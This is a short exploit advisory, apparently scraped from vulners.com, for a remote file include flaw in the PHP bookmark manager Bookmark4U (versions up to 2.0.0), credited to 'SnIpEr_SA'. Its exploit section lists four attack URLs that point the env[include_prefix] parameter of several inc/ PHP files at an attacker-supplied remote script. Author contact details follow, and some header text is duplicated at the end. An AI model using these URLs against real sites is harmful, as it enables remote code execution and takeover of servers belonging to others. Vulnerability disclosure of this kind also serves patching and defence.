Bookmark4U Remote File Include

2006-06-0600:00:00

vulners.com

JSON

Bookmark4U <= 2.0.0? ([include_prefix]) Remote File Include Vulnerabilities

Discovered By SnIpEr_SA
Author : SnIpEr_SA
Remote : Yes
Local : No
Critical Level : Dangerous

Affected software description:


Application : Bookmark4U
version     : 2.0.0
URL         :http://bookmark4u.sourceforge.net/
... 
------------------------------------------------------------------ 
Exploit:
~~~~~~~~ 
# http://www.site.com/[Bookmark4Upath]/inc/dbase.php?env[include_prefix]=[evil_scripts]
# http://www.site.com/[Bookmark4Upath]/inc/config.php?env[include_prefix]=[evil_scripts]
# http://www.site.com/[Bookmark4Upath]/inc/common.php?env[include_prefix]=[evil_scripts]
# http://www.site.com/[Bookmark4Upath]/inc/function.php?env[include_prefix]=[evil_scripts]

--------------------------------------------------------------------------- 
*/
Contact:
 ~~~~~~~~
 SnIpEr_SA
E-mail: selfar2002@hotmail.com
E-mail: SnIpEr.SA[at]hotMail[dot]com
Homepage: http://www.3asfh.net/  &amp; http://www.lezr.com/
Greetz: All My Frind
/* 
-------------------------------- [ END ] ----------------------------------

JSON

Bookmark4U Remote File Include

Bookmark4U <= 2.0.0? ([include_prefix]) Remote File Include Vulnerabilities

Discovered By SnIpEr_SA Author : SnIpEr_SA Remote : Yes Local : No Critical Level : Dangerous

Discovered By SnIpEr_SA
Author : SnIpEr_SA
Remote : Yes
Local : No
Critical Level : Dangerous